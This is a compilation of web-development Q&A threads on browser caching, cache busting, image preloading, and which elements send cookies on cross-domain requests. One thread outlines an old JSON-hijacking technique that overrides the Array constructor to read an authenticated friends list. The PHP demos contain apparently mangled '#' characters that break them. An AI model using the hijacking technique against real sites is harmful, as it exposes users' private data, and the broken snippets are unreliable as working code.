How can i cache javascript static files on www.foo.ru from www.abc.ru ?
I try load it by script tag (set src attribute), but when i go to www.abc.ru requests is sending again, cache is ignored. Does browser separate cache by origin or something else?
As Terry said in a comment, you can't do that directly. It used to be possible, but it was an information leak (http://malicious-site-example.com could see that it gets a really fast response to http://example.com/some-asset and use that information [probably in combination with other similar heuristics] to infer that you've been on http://example.com lately). So now, the cached response is only used for the origin that originally requested it — that is, effectively different origins have different caches.
Presumably you only want to do this on a pair of sites where you control both of them. In that case, you might use an iframe on foo.ru's page that directly loads a page from abc.ru that does the load. Then it's abc.ru that's doing the request, and it's cached such that it's connected to abc.ru, not foo.ru. You can hide the iframe by making it zero-height or off the page or similar.
Related
One of the first earlier hacks of a major social website ( using old browser) was :
login to the site, so you got a cookie
create script tag which reference the "get friends list" url
override the array constructor via JS
and since the <script> tag does send a cookie , the request is authenticated and response with pure JSON (unrunnable) code - but since we override the array ctor , we can get the data.
That's fine ( that was a preview to my question).
Question
What is the complete list of elements which also send a cookie for a cross domain request ?
Wouldn't it be more accurate to say that any resource requested by the browser to a certain domain, would send the cookies in the request. So really, any elements that "loads" any resource from a server would have the cookies sent. So I'd say images, json files, html/php files, external CSS files and probably web fonts would send cookies. This could be one of the reasons why you would want to host your resources (scripts,CSS files, images) on another domain as an optimisation thing.
This JSFiddle is mostly a proof that CSS files can "remember".
HTML
<link href="remember.php?.css" rel="stylesheet"/>
Remember Red
Javascript
red.onclick=function(e){
var img=new Image()
img.src="remember.php?col=red"
return false
}
remember.php
if(isset($_GET["col"])){
$_SESSION["fav_color"]=$_GET["col"];
}
echo "body {
color:".htmlentities(#$_SESSION["fav_color"] ?: "blue")."
}";
So what should happen is that, when we load an image with URI remember.php?col=red, the server will remember that the color value even on refresh. Same principal with images and I would assume web fonts.
Another example are images. Which should send cookies, when loaded. Though, for example, stackoverflow.com hosts the images in another domain (in this case the layout stuff is on cdn.sstatic.net/stackoverflow/img/sprites.png ). And even if it did send, we wouldn't normally know if cookies was sent unless the cookie affects the image somehow. But if we check with the developer tools we would actually note that cookies do get sent. For example:
An image hosted on php.net
Same image on a different domain
As you can see, the cookies do get sent. Even when cross-domain. As further proof, the remember.php demo but with images.
Demo
HTML
<img src="http://mfirdaus.net/random/so/remember_image.php"/>
Toggle Image
Javascript
toggle.onclick=function(){
var img=new Image()
img.src="http://mfirdaus.net/random/so/remember_image.php?toggle"
img.onerror=function(){
window.location=window.location
}
return false
}
remember_image.php
if(isset($_GET["toggle"])){
$_SESSION["like_cats"]=!#$_SESSION["like_cats"];
die();
}
echo file_get_contents(#$_SESSION["like_cats"] ? "cat.jpeg" : "duck.jpeg" );
In this demo, the cookie does affect the image hence, it's easier to tell that the cookies get sent with images.
Now whether this resource contains privileged data (such as the JSON data that contains the friendlist) and the page calling this resource have the capability to use this privileged data (in this case, by doing magic javascript stuff to exploit the JSON) is another matter. Browsers should be safe enough that most of the obvious vectors should be secured. We can't even access other domain's images directly to put in canvases due to security. But of course there will be those pesky bugs and exploits for browser vendors to deal with.
I used to use this fact to make a Firefox extension that just scraped authenticated pages of a website to show a sidebar with parsed data, because ajax in Firefox extensions doesn't have the same-domain restrictions as normal pages, and I didn't have to bother to do anything special to authenticate because ajax sends the cookies as one would expect.
I'm currently trying to preload images for a webpage I'm creating as those images are quite big.
Currently I know (thanks to another post here) how to handle the images themselves via preloading them (via javascript pre loading and then displaying them in a canvas).
BUT whenever I switch the page the preloaded images need to be preloaded again, thus they are not cached.
So my question is: Is there any possibility to cache these images?
(or is it even best to put them into a session variable?)
The images themselves are quite big and can take up 1.5MB each (in total there are 20 images alone in the part that is currently already in existence, which takes about 4 seconds to preload).
As infos if necessary:
I'm using an apache server and php as primary language with javascript as support.
Edit:
As I forgot to mention it: The webserver I will finally store the site on is an external one (hosting provider) so I won't be able to edit the webserversettings themselves there
If the images don't change, try something like this in .htaccess:
#Set caching on image files for 11 months
<filesMatch "\.(ico|gif|jpg|png)$">
ExpiresActive On
ExpiresDefault "access plus 11 month"
Header append Cache-Control "public"
</filesMatch>
If you think this is not the right approach, like the images may change, just eager-load the images right when the page hits (warning, definitely a hack):
(function(){
var hiddenCache = document.createElement("div");
hiddenCache.style.display = "none";
document.body.appendChild(hiddenCache);
// or for loop if ECMA 3
myEagerLoadedImageUrls.forEach(function(urlStr){
var hiddenImg = document.createElement("img");
hiddenImg.src = urlStr;
hiddenCache.appendChild(hiddenImg)
});
})()
The browser already caches the images in its memory and/or disk cache as long as the headers coming from the server aren't telling it to avoid caching. The browser cache endures across page loads. SO, if your images have been loaded once on the first page, they should be in the browser cache already for the second page and thus when requested on the second page, they should load locally and not have to be fetched over the internet.
If you're looking for client-side code that can be used to preload images, there are many examples:
How do you cache an image in Javascript
Image preloader javascript that supports events
Is there a way to load images to user's cache asynchronously?
FYI, it is possible in newer browsers to use a combination of Local Storage and data URIs to implement your own image caching, but I'd be surprised if there was any real world situation where that was required and if you have a lot of images, you may run into storage limits on Local Storage quicker than limits on the size of the browser cache.
I have a Javascript library I'm working on. It can be self-hosted or run from another server. The script makes a number of AJAX calls and the preferred method is making POST requests to the same host as the including page. To allow for cross-domain calls it also supports JSONP, but this limits the amount of data that can be sent (~2K to safely accommodate most modern browsers' URL length limits).
Obviously the user including the script knows where they're getting it from and could manually select JSONP as needed, but in the interest of simplifying things, I'd like to detect, within the script itself, whether the script was loaded from the same host as the page including it or not.
I'm able to grab the script element with jQuery but doing a $('script').attr('src') is only returning a relative path (e.g. "/js/my-script.js" not "http://hostname.com/js/my-script.js") even when it's being loaded from a different host.
Is this possible and if so, how would I go about it?
Thanks in advance.
Don't use JSONP, use CORS headers.
But if you really want to do JS check, use var t = $('script')[0].outerHTML.
Effect on my page:
[20:43:34.865] "<script src="http://www.google-analytics.com/ga.js" async="" type="text/javascript"></script>"
Checking location.host should do the trick.
I'm writing a javascript application. In my application I want to create my own cache management.
Now my question is: Is there any bottleneck in javascript (e.g. any event on window object) that we can handle and modify all server communications?
many tags in the page can request a resource from server e.g. img, link, script.
In other words I want a bottleneck in javascript that I can be notified that a resource is requested from server. Then I will look into my cache-system and will serve the resource either from my cache or by downloading the content from a generic HTTP handler on my server.
I know it's a bit strange requirement but because I believe javascript is very flexible I though this "bottleneck" may exist.
Thank you.
One way to lazy load resources is to set a common source (eg. 1.gif for images, x.txt for script/css) pointing at small, cacheable resources. Then set a data attribute on the element with the actual path to the content.
<img src="/1.gif" data-url="/images/puppies.png" class="onhold" />
Finally, on domready or document load you could do your logic to set the proper urls, replace dom element, etc. Using jQuery you'd do something like this -
jQuery(document).ready(function($){
$("img.onhold").each(function() {
var img = $(this),
url = img.data("url");
// any logic to update url based on cache, CDN, etc. here
img.attr("src", url);
});
});
I've been learning JavaScript recently, and I've seen a number of examples (Facebook.com, the Readability bookmarklet) that use Math.rand() for appending to links.
What problem does this solve? An example parameter from the Readability bookmarklet:
_readability_script.src='http://lab.arc90.com/....script.js?x='+(Math.random());
Are there collisions or something in JavaScript that this is sorting out?
As Rubens says, it's typically a trick employed to prevent caching. Browsers typically cache JavaScript and CSS very aggressively, which can save you bandwidth, but can also cause deployment problems when changing your scripts.
The idea is that browsers will consider the resource located at http://www.example.com/something.js?foo different from http://www.example.com/something.js?bar, and so won't use their local cache to retrieve the resource.
Probably a more common pattern is to append an incrementing value which can be altered whenever the resource needs to change. In this way, you benefit by having repeat requests served by the client-side cache, but when deploying a new version, you can force the browser to fetch the new version.
Personally, I like to append the last-modified time of the file as as a Unix timestamp, so I don't have to go hunting around and bumping version numbers whenever I change the file.
Main point is to avoid browser caching those resources.
This will ensure that the script is unique and will not cached as a static resource since the querystring changes each time.
This is because Internet Explorer likes to cache everything, including requests issued via JavaScript code.
Another way to do this, without random numbers in the URL, is to add Cache-Control headers to the directories with the items you don't want cached:
# .htaccess
Header set Cache-Control "no-cache"
Header set Pragma "no-cache"
Most browsers respect Cache-Control but IE (including 7, haven't tested 8) only acknowledge the Pragma header.
Depending on how the browser chooses to interpret the caching hints of a resource you might not get the desired effect if you just asked the browser to change the url to a url it has previously used. (most mouse-over image buttons rely on the fact that the browser will reuse the cached resource for speed)
When you want to make sure that the browser gets a fresh copy of the resource (like a dynamic stock ticker image or the like) you force the browser to always think the content is newby appending either the date/time or a every-incresing number or random gargabe).
There is a tool called squid that can cache web pages. Using a random number will guarantee that request will not be ached by an intermediate like this. Even with Header set Cache-Control "no-cache" you may still need to add a random number to get through something like "squid".